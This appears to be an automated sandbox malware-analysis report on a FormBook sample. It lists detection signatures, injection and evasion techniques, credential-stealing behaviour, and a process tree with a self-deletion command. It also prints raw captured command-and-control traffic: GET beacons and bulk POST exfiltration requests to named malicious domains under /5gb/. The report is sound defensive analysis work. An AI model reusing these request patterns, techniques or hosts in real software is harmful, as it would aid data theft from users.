Loading ...

Play interactive tourEdit tour

Analysis Report vSCyL8NNIC.exe

Overview

General Information

Sample Name:vSCyL8NNIC.exe
Analysis ID:285610
MD5:96f6deb36c8406eccfccc7bd38267c0e
SHA1:fb149c90507adb9461e54df9824407e5449460ec
SHA256:52a3e59905cc8e33bc33223e1b55482b484c6e04d7795a7329946a77502e950d

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected FormBook malware
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Binary contains a suspicious time stamp
Creates an undocumented autostart registry key
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file access)
Writes to foreign memory regions
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Startup

  • System is w10x64
  • vSCyL8NNIC.exe (PID: 7084 cmdline: 'C:\Users\user\Desktop\vSCyL8NNIC.exe' MD5: 96F6DEB36C8406ECCFCCC7BD38267C0E)
    • RegSvcs.exe (PID: 7124 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe MD5: 2867A3817C9245F7CF518524DFD18F28)
      • explorer.exe (PID: 3376 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • autofmt.exe (PID: 6112 cmdline: C:\Windows\SysWOW64\autofmt.exe MD5: 7FC345F685C2A58283872D851316ACC4)
        • chkdsk.exe (PID: 6492 cmdline: C:\Windows\SysWOW64\chkdsk.exe MD5: 2D5A2497CB57C374B3AE3080FF9186FB)
          • cmd.exe (PID: 6792 cmdline: /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6780 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

barindex
Multi AV Scanner detection for submitted fileShow sources
Source: vSCyL8NNIC.exeVirustotal: Detection: 23%Perma Link
Source: vSCyL8NNIC.exeReversingLabs: Detection: 22%
Machine Learning detection for sampleShow sources
Source: vSCyL8NNIC.exeJoe Sandbox ML: detected
Source: 1.2.RegSvcs.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then pop edi1_2_00416BC5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then pop edi1_2_00416C40

Networking:

barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
Source: TrafficSnort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.102.136.180:80 -> 192.168.2.4:49738
Source: global trafficHTTP traffic detected: GET /5gb/?0B=LZxP&jJEXPjV=wkiRR1Aw+Nr4Qs3rRkg1xbSjrbPlsIXn1FpdqrR7N9kZqsYnB2egJP22LrAYllq2dgSl HTTP/1.1Host: www.nationbuolder.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global trafficHTTP traffic detected: GET /5gb/?jJEXPjV=VSxJHqYOiiT/QfeO16tpc+XSptzmGTZDDQA2CuabIISuT1EE8M4dKQacUbfINdmsiM57&0B=LZxP HTTP/1.1Host: www.finanzasadilia.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global trafficHTTP traffic detected: GET /5gb/?0B=LZxP&jJEXPjV=okNRSiupe8c8QAdYgh0f+o4aR61IgfaHtn4dWuciZgJWAwn99zimG+/MTmPPo01PSLkg HTTP/1.1Host: www.thestupidquestion.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: Joe Sandbox ViewIP Address: 34.102.136.180 34.102.136.180
Source: Joe Sandbox ViewASN Name: GOOGLE-2US GOOGLE-2US
Source: Joe Sandbox ViewASN Name: GOOGLEUS GOOGLEUS
Source: global trafficHTTP traffic detected: POST /5gb/ HTTP/1.1Host: www.finanzasadilia.comConnection: closeContent-Length: 413Cache-Control: no-cacheOrigin: http://www.finanzasadilia.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.finanzasadilia.com/5gb/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 6a 4a 45 58 50 6a 56 3d 64 77 39 7a 5a 4e 51 67 28 53 6a 75 45 5f 7a 35 69 5f 49 6c 4e 4c 7a 4c 67 49 48 70 42 6e 6c 43 66 45 42 7a 62 4a 54 43 47 4c 43 34 56 6e 49 61 31 38 46 37 49 58 76 63 4d 2d 66 6f 61 65 75 44 67 4c 49 32 45 30 48 5a 65 4b 61 57 4e 5a 38 70 52 38 28 4f 78 66 45 56 57 4d 4d 71 54 41 56 71 65 61 46 4e 4c 70 30 68 59 76 33 45 77 44 44 76 75 33 73 55 39 62 76 45 57 77 6a 5f 4e 34 4a 4c 47 6e 6a 56 56 65 77 31 73 4a 6e 57 78 78 4c 39 70 45 56 33 6a 66 45 4e 28 39 4f 4f 37 6b 36 34 6c 64 6a 43 4c 49 56 63 53 79 50 47 34 42 4e 59 74 69 79 6d 41 52 58 59 67 79 30 79 71 74 51 52 39 39 75 46 35 39 62 56 71 62 64 76 6a 4d 71 63 28 69 74 74 73 55 75 35 31 74 47 36 58 59 6d 52 33 66 74 33 4b 6e 4e 5f 4b 77 6f 58 49 30 28 59 71 76 44 78 43 44 53 4f 74 4e 38 6b 45 6b 45 47 54 4e 69 48 53 69 48 6c 7a 65 44 57 48 76 37 4a 74 43 28 6e 63 6c 74 78 59 4f 50 69 28 65 70 34 58 36 48 4d 6d 73 4c 31 51 50 31 49 68 2d 65 77 4c 32 6c 54 4c 41 49 36 5a 61 4d 77 32 75 75 6e 4f 6c 44 58 56 41 6d 78 5a 31 30 7a 48 36 66 57 32 67 45 6a 36 43 7e 33 6d 30 4b 4e 61 63 67 44 36 72 6d 7a 55 46 6f 66 7a 48 48 4c 4d 77 46 7a 44 72 4a 74 7e 54 79 39 43 74 41 44 38 31 42 66 6b 6e 53 74 33 35 39 77 41 76 33 42 6e 38 4b 4b 28 77 29 2e 00 00 00 00 00 00 00 00 Data Ascii: jJEXPjV=dw9zZNQg(SjuE_z5i_IlNLzLgIHpBnlCfEBzbJTCGLC4VnIa18F7IXvcM-foaeuDgLI2E0HZeKaWNZ8pR8(OxfEVWMMqTAVqeaFNLp0hYv3EwDDvu3sU9bvEWwj_N4JLGnjVVew1sJnWxxL9pEV3jfEN(9OO7k64ldjCLIVcSyPG4BNYtiymARXYgy0yqtQR99uF59bVqbdvjMqc(ittsUu51tG6XYmR3ft3KnN_KwoXI0(YqvDxCDSOtN8kEkEGTNiHSiHlzeDWHv7JtC(ncltxYOPi(ep4X6HMmsL1QP1Ih-ewL2lTLAI6ZaMw2uunOlDXVAmxZ10zH6fW2gEj6C~3m0KNacgD6rmzUFofzHHLMwFzDrJt~Ty9CtAD81BfknSt359wAv3Bn8KK(w).
Source: global trafficHTTP traffic detected: POST /5gb/ HTTP/1.1Host: www.finanzasadilia.comConnection: closeContent-Length: 185505Cache-Control: no-cacheOrigin: http://www.finanzasadilia.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.finanzasadilia.com/5gb/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 6a 4a 45 58 50 6a 56 3d 64 77 39 7a 5a 4d 6f 65 73 53 6e 5f 50 73 48 34 6a 76 59 54 48 59 37 6a 71 76 32 7a 52 41 4a 57 57 32 56 34 62 4a 43 71 50 71 53 4d 53 45 41 61 7a 2d 39 38 47 58 76 62 4f 2d 66 72 51 2d 53 56 70 39 4d 75 45 31 7a 6a 65 4b 53 56 47 38 77 77 66 4d 28 6a 77 5f 5a 75 48 59 6c 75 54 44 68 50 51 59 70 76 65 5a 34 68 57 5f 76 38 30 69 54 4f 6d 56 59 4c 7e 71 44 4c 51 78 4c 63 4b 50 35 7a 47 42 71 77 64 5f 74 54 37 4c 37 64 30 31 50 56 74 57 31 38 74 75 68 46 36 39 72 45 30 6e 75 38 6b 65 37 73 58 35 56 64 4e 52 28 45 6f 53 6c 71 6d 7a 32 31 46 42 6d 68 67 30 31 50 75 62 6f 4d 73 75 71 64 28 4e 37 37 7e 65 39 2d 39 4c 58 5a 6f 33 35 63 71 56 65 57 70 64 33 38 42 5a 4b 68 30 62 63 36 4f 46 39 45 4d 43 41 54 41 6c 50 73 36 6f 54 50 4f 67 4b 68 67 75 64 38 64 6b 6b 4f 48 76 76 6b 50 53 47 7a 31 65 44 53 53 50 37 78 37 44 75 6c 64 52 51 54 59 50 47 36 6c 66 56 35 48 6f 7a 4d 72 70 57 4c 66 66 46 45 70 75 50 48 61 48 68 45 59 54 55 7a 61 61 4d 6f 32 6f 36 38 4f 6c 44 62 56 46 4b 50 59 48 49 7a 47 72 28 5f 69 6e 77 6e 79 69 7e 51 67 31 6d 54 56 4d 63 54 36 76 4b 7a 56 77 4d 35 78 77 62 4c 4a 69 78 30 44 4b 4a 74 7a 44 79 39 4a 4e 42 77 39 6c 73 32 69 53 33 42 7e 34 78 65 42 4a 53 65 6a 4d 6d 48 69 6f 4a 54 4a 63 72 4f 6d 51 4c 4b 4c 6b 37 34 35 78 4d 56 68 6c 77 48 62 76 6b 39 58 54 46 4d 4c 66 64 2d 4a 47 69 41 37 36 55 44 6a 4b 55 63 61 5a 59 62 70 54 5a 63 33 79 6d 68 73 6a 5a 6a 4a 72 6a 4c 64 41 72 47 77 4a 4e 61 30 33 5a 6e 34 73 69 64 31 73 6c 48 31 78 52 4d 6a 43 65 6b 6e 4e 5a 35 53 4c 72 62 28 4a 36 42 51 47 6b 65 5a 62 68 6f 46 58 62 6c 63 5a 4d 45 6e 75 58 73 33 48 32 54 39 62 35 4e 6d 71 33 79 77 54 66 54 35 38 34 48 6c 45 4d 55 39 42 69 6b 63 79 74 49 75 39 4f 55 58 65 7e 4e 31 73 38 31 72 2d 59 46 4a 6f 76 4e 6e 53 77 59 46 71 6e 36 52 69 58 62 68 73 53 39 69 78 68 51 5a 72 36 41 6c 57 7e 53 6c 74 38 47 6f 62 7e 64 6a 73 77 74 53 2d 54 78 42 6a 55 66 74 6b 47 41 71 64 71 33 72 47 38 5f 50 72 51 61 39 62 73 75 79 37 59 57 44 32 65 32 34 5a 65 6a 47 65 31 68 4a 35 73 47 42 43 6c 39 34 51 68 4a 55 35 73 59 36 6a 70 52 44 41 4a 4f 30 51 78 43 71 41 73 43 49 59 61 51 58 57 54 46 4b 5a 6c 31 61 34 31 78 68 74 35 38 6f 49 64 52 56 4f 74 4f 72 70 4a 4c 74 34 4c 58 39 57 67 6e 61 6d 72 4e 42 54 42 48 6d 71 72 37 34 79 65 63 4d 6b 4d 47 39 6d 61 4c 54 4f 65 38 42 43 7a 6d 31 4d 54 64 6e 6c 5a 6e 4e 63 44 49 78 6f 42 6e 72 5f 42 70 76 31 35 58 38 73 42 63 78 31 5a 37 54 4b 4e 50 79 53 32 5f 59 2d 54 6f 6e 61 67 6c 51 69 4f 53 57 44 47 78 73 68 55 2d 6c 32 48 52 44 42 4b 55 46 57 73 77 34 72 53 33 6f 66 5a 35 30 71 37 46 7
Source: global trafficHTTP traffic detected: POST /5gb/ HTTP/1.1Host: www.thestupidquestion.comConnection: closeContent-Length: 413Cache-Control: no-cacheOrigin: http://www.thestupidquestion.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.thestupidquestion.com/5gb/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 6a 4a 45 58 50 6a 56 3d 67 47 42 72 4d 43 65 37 66 64 4d 2d 4a 48 55 51 36 42 31 6b 75 4e 63 65 59 4b 74 55 6c 2d 32 51 37 33 64 76 4e 4f 59 5f 58 45 6f 54 42 69 7e 6b 76 51 69 5f 49 4c 79 4d 4a 6b 28 47 71 46 78 43 63 34 4e 57 41 49 63 70 50 50 4c 6b 5a 34 33 52 73 35 59 74 7e 77 31 63 59 73 45 6f 43 57 78 32 78 45 7e 44 33 37 4d 5a 69 36 31 46 6a 34 51 74 35 6a 45 47 35 41 68 4a 44 4e 4a 30 47 6c 72 63 59 61 58 67 31 52 31 58 61 42 66 49 37 76 6e 34 73 67 49 4f 77 48 52 49 4c 49 78 6f 37 57 6d 4e 6a 6b 73 50 67 7a 63 50 37 69 6e 42 72 42 58 62 4e 70 70 32 74 75 31 6b 64 78 5a 38 30 49 4a 51 50 44 69 6f 51 43 64 72 66 6f 38 6c 70 6f 6c 33 36 69 4d 79 54 42 59 54 4f 51 32 65 51 4a 4b 70 6b 6e 33 66 44 61 78 75 49 5f 41 34 28 36 28 35 79 71 4a 52 33 49 47 52 64 48 76 52 56 31 74 37 55 61 42 39 37 77 78 30 4c 2d 56 76 39 75 31 31 66 79 50 75 61 65 49 70 73 4d 53 73 6c 71 63 4b 41 69 44 56 6a 58 6b 49 4b 54 78 36 4e 59 51 72 4a 6c 38 65 58 38 49 44 30 36 6f 5a 43 6d 4e 65 61 5f 52 4c 35 33 41 33 77 35 6d 5f 62 70 55 61 47 79 57 53 67 57 36 46 28 66 66 31 47 58 76 59 7a 6b 59 67 34 6d 54 4e 31 2d 7e 49 63 48 65 6a 44 4c 36 68 49 37 52 62 65 43 46 72 4a 68 6f 5f 54 6a 54 42 78 51 36 6a 51 55 53 44 4b 6a 43 31 4b 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: jJEXPjV=gGBrMCe7fdM-JHUQ6B1kuNceYKtUl-2Q73dvNOY_XEoTBi~kvQi_ILyMJk(GqFxCc4NWAIcpPPLkZ43Rs5Yt~w1cYsEoCWx2xE~D37MZi61Fj4Qt5jEG5AhJDNJ0GlrcYaXg1R1XaBfI7vn4sgIOwHRILIxo7WmNjksPgzcP7inBrBXbNpp2tu1kdxZ80IJQPDioQCdrfo8lpol36iMyTBYTOQ2eQJKpkn3fDaxuI_A4(6(5yqJR3IGRdHvRV1t7UaB97wx0L-Vv9u11fyPuaeIpsMSslqcKAiDVjXkIKTx6NYQrJl8eX8ID06oZCmNea_RL53A3w5m_bpUaGyWSgW6F(ff1GXvYzkYg4mTN1-~IcHejDL6hI7RbeCFrJho_TjTBxQ6jQUSDKjC1KQ).
Source: global trafficHTTP traffic detected: POST /5gb/ HTTP/1.1Host: www.thestupidquestion.comConnection: closeContent-Length: 185505Cache-Control: no-cacheOrigin: http://www.thestupidquestion.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.thestupidquestion.com/5gb/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 6a 4a 45 58 50 6a 56 3d 67 47 42 72 4d 48 36 42 64 74 49 72 4e 79 4d 52 31 78 46 53 38 2d 55 4d 53 70 70 4c 6d 75 4f 45 32 41 6c 5f 4e 50 49 6a 66 68 5a 55 53 78 32 6b 36 47 32 79 45 4c 79 4c 50 6b 28 42 39 31 74 2d 65 72 39 65 41 4a 5a 4f 50 50 44 6e 4f 76 47 36 74 70 59 45 7e 51 35 6b 4d 63 51 4a 43 51 34 55 79 67 61 62 38 72 41 5a 37 4f 68 4c 6d 5a 68 35 36 6d 6f 4a 78 51 39 41 42 4e 52 58 42 56 58 67 5a 38 66 43 38 31 74 5a 4e 52 6e 66 6e 66 58 41 72 78 4d 56 7e 32 68 50 45 76 77 31 6d 6e 37 45 6d 6c 73 70 38 69 63 49 31 32 7a 31 73 44 4f 6d 49 62 46 4c 72 5f 46 61 64 33 59 42 35 64 49 65 65 55 43 67 53 7a 52 46 58 35 34 6a 6d 37 39 5f 77 48 68 49 52 41 6f 38 47 30 6e 59 56 5a 75 38 6c 56 50 50 65 76 56 56 62 65 64 35 33 72 76 52 79 37 4e 5a 34 73 36 75 58 67 54 47 64 45 4e 6a 54 66 78 62 34 51 78 58 45 65 56 37 31 2d 31 4e 61 54 66 62 61 71 4e 5f 73 4c 4f 36 76 61 77 4a 42 6b 44 56 74 57 55 7a 4a 67 4a 32 59 35 41 54 65 57 51 6a 52 2d 56 39 6e 4b 6f 42 43 6b 6c 56 61 5f 51 79 35 79 73 4a 7e 6f 79 5f 42 59 30 4a 46 52 75 65 6f 32 36 49 7a 76 50 72 52 55 4c 49 7a 6b 41 67 37 33 6a 7a 30 4d 65 49 4e 6b 57 69 43 71 36 68 4c 4c 52 62 54 69 45 31 5a 79 52 61 48 7a 79 68 69 51 44 49 61 54 79 56 4d 68 43 5f 53 61 70 39 47 44 72 42 74 46 54 49 6a 6e 5a 70 54 78 77 38 30 78 56 44 62 45 79 6c 5a 37 5a 45 79 4f 33 4b 37 4d 7e 68 43 54 79 33 39 6e 46 57 4c 5a 52 4a 72 39 28 50 59 49 56 35 64 34 46 47 7e 4a 30 55 68 75 64 58 73 42 36 35 49 78 4b 47 32 53 4e 36 73 45 72 5a 45 5f 32 63 32 46 77 32 30 30 73 47 43 69 79 4e 6f 6c 6f 77 79 30 66 46 59 65 7a 52 77 65 58 4e 61 65 76 62 4e 53 44 57 62 41 6a 6b 6c 34 37 51 54 30 63 53 70 73 28 4d 79 65 34 32 76 69 45 5f 4f 33 4c 32 6b 35 75 50 61 4a 6b 2d 37 6c 47 64 5a 42 75 36 35 35 7a 48 53 5a 5a 6a 67 53 4f 31 6c 68 48 58 72 54 31 4b 39 73 42 78 59 75 4a 72 48 2d 62 4e 69 38 77 6f 4b 49 71 6e 5a 34 69 78 7e 39 54 66 48 64 39 66 51 39 67 5a 42 58 47 34 44 6f 4d 76 32 70 64 4f 75 79 38 54 45 46 33 33 6f 6e 6a 6a 7e 66 38 52 4c 49 50 48 56 69 4b 48 6a 73 54 4e 41 55 67 43 6f 62 72 48 73 44 33 38 68 4a 58 54 56 69 51 5f 57 58 30 75 72 34 67 52 47 6c 48 75 35 49 6c 59 47 46 64 41 57 59 37 31 79 50 69 63 5a 6f 74 47 53 4d 48 49 6c 70 47 48 38 61 77 6e 46 36 35 52 49 76 61 46 42 79 68 6e 44 4d 54 5f 69 53 72 75 74 4c 41 74 74 79 46 69 47 41 71 79 48 68 46 4e 32 4e 76 69 76 4c 70 50 6f 61 61 53 65 74 72 45 74 5f 69 6c 4c 67 53 42 57 4d 66 36 55 6d 4b 4c 4a 71 65 64 28 73 44 6f 69 76 6f 74 6e 6e 71 5f 6b 54 57 39 55 47 53 39 4f 41 36 63 72 48 55 53 6b 51 4d 51 74 64 4c 37 38 6f 72 39 61 31 4a 67 36 6
Source: global trafficHTTP traffic detected: GET /5gb/?0B=LZxP&jJEXPjV=wkiRR1Aw+Nr4Qs3rRkg1xbSjrbPlsIXn1FpdqrR7N9kZqsYnB2egJP22LrAYllq2dgSl HTTP/1.1Host: www.nationbuolder.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global trafficHTTP traffic detected: GET /5gb/?jJEXPjV=VSxJHqYOiiT/QfeO16tpc+XSptzmGTZDDQA2CuabIISuT1EE8M4dKQacUbfINdmsiM57&0B=LZxP HTTP/1.1Host: www.finanzasadilia.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global trafficHTTP traffic detected: GET /5gb/?0B=LZxP&jJEXPjV=okNRSiupe8c8QAdYgh0f+o4aR61IgfaHtn4dWuciZgJWAwn99zimG+/MTmPPo01PSLkg HTTP/1.1Host: www.thestupidquestion.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: unknownDNS traffic detected: queries for: www.nationbuolder.com
Source: unknownHTTP traffic detected: POST /5gb/ HTTP/1.1Host: www.finanzasadilia.comConnection: closeContent-Length: 413Cache-Control: no-cacheOrigin: http://www.finanzasadilia.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.finanzasadilia.com/5gb/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 6a 4a 45 58 50 6a 56 3d 64 77 39 7a 5a 4e 51 67 28 53 6a 75 45 5f 7a 35 69 5f 49 6c 4e 4c 7a 4c 67 49 48 70 42 6e 6c 43 66 45 42 7a 62 4a 54 43 47 4c 43 34 56 6e 49 61 31 38 46 37 49 58 76 63 4d 2d 66 6f 61 65 75 44 67 4c 49 32 45 30 48 5a 65 4b 61 57 4e 5a 38 70 52 38 28 4f 78 66 45 56 57 4d 4d 71 54 41 56 71 65 61 46 4e 4c 70 30 68 59 76 33 45 77 44 44 76 75 33 73 55 39 62 76 45 57 77 6a 5f 4e 34 4a 4c 47 6e 6a 56 56 65 77 31 73 4a 6e 57 78 78 4c 39 70 45 56 33 6a 66 45 4e 28 39 4f 4f 37 6b 36 34 6c 64 6a 43 4c 49 56 63 53 79 50 47 34 42 4e 59 74 69 79 6d 41 52 58 59 67 79 30 79 71 74 51 52 39 39 75 46 35 39 62 56 71 62 64 76 6a 4d 71 63 28 69 74 74 73 55 75 35 31 74 47 36 58 59 6d 52 33 66 74 33 4b 6e 4e 5f 4b 77 6f 58 49 30 28 59 71 76 44 78 43 44 53 4f 74 4e 38 6b 45 6b 45 47 54 4e 69 48 53 69 48 6c 7a 65 44 57 48 76 37 4a 74 43 28 6e 63 6c 74 78 59 4f 50 69 28 65 70 34 58 36 48 4d 6d 73 4c 31 51 50 31 49 68 2d 65 77 4c 32 6c 54 4c 41 49 36 5a 61 4d 77 32 75 75 6e 4f 6c 44 58 56 41 6d 78 5a 31 30 7a 48 36 66 57 32 67 45 6a 36 43 7e 33 6d 30 4b 4e 61 63 67 44 36 72 6d 7a 55 46 6f 66 7a 48 48 4c 4d 77 46 7a 44 72 4a 74 7e 54 79 39 43 74 41 44 38 31 42 66 6b 6e 53 74 33 35 39 77 41 76 33 42 6e 38 4b 4b 28 77 29 2e 00 00 00 00 00 00 00 00 Data Ascii: jJEXPjV=dw9zZNQg(SjuE_z5i_IlNLzLgIHpBnlCfEBzbJTCGLC4VnIa18F7IXvcM-foaeuDgLI2E0HZeKaWNZ8pR8(OxfEVWMMqTAVqeaFNLp0hYv3EwDDvu3sU9bvEWwj_N4JLGnjVVew1sJnWxxL9pEV3jfEN(9OO7k64ldjCLIVcSyPG4BNYtiymARXYgy0yqtQR99uF59bVqbdvjMqc(ittsUu51tG6XYmR3ft3KnN_KwoXI0(YqvDxCDSOtN8kEkEGTNiHSiHlzeDWHv7JtC(ncltxYOPi(ep4X6HMmsL1QP1Ih-ewL2lTLAI6ZaMw2uunOlDXVAmxZ10zH6fW2gEj6C~3m0KNacgD6rmzUFofzHHLMwFzDrJt~Ty9CtAD81BfknSt359wAv3Bn8KK(w).
Source: explorer.exe, 00000002.00000000.236799858.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
Source: vSCyL8NNIC.exe, 00000000.00000002.221758269.0000000002DE1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: chkdsk.exe, 00000005.00000002.478812914.00000000063EF000.00000004.00000001.sdmpString found in binary or memory: http://thestupidquestion.com/5gb/?0B=LZxP&jJEXPjV=okNRSiupe8c8QAdYgh0f
Source: explorer.exe, 00000002.00000000.236799858.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000002.00000000.236799858.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000002.00000000.236799858.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000002.00000000.236799858.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000002.00000000.236799858.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000002.00000000.236799858.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000002.00000000.236799858.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: explorer.exe, 00000002.00000000.236799858.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000002.00000000.236799858.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000002.00000000.236799858.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000002.00000000.236799858.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000002.00000000.236799858.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000002.00000000.236799858.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000002.00000000.236799858.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000002.00000000.236799858.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000002.00000000.236799858.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000002.00000000.236799858.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000002.00000000.236799858.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000002.00000000.236799858.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000002.00000000.236799858.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000002.00000000.236799858.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
Source: chkdsk.exe, 00000005.00000002.478472567.0000000006079000.00000004.00000001.sdmpString found in binary or memory: http://www.thestupidquestion.com
Source: chkdsk.exe, 00000005.00000002.478472567.0000000006079000.00000004.00000001.sdmpString found in binary or memory: http://www.thestupidquestion.com/5gb/
Source: explorer.exe, 00000002.00000000.236799858.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000002.00000000.236799858.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000002.00000000.236799858.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000002.00000000.236799858.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
Source: chkdsk.exe, 00000005.00000002.476043438.00000000054C0000.00000004.00000001.sdmp, chkdsk.exe, 00000005.00000003.362069165.00000000054BE000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: chkdsk.exe, 00000005.00000002.476043438.00000000054C0000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: chkdsk.exe, 00000005.00000003.362069165.00000000054BE000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld255
Source: chkdsk.exe, 00000005.00000003.362069165.00000000054BE000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2;
Source: chkdsk.exe, 00000005.00000002.473825727.0000000001238000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2Gw
Source: chkdsk.exe, 00000005.00000002.475943416.000000000549C000.00000004.00000020.sdmp, chkdsk.exe, 00000005.00000002.476043438.00000000054C0000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: chkdsk.exe, 00000005.00000003.362069165.00000000054BE000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033LMEM
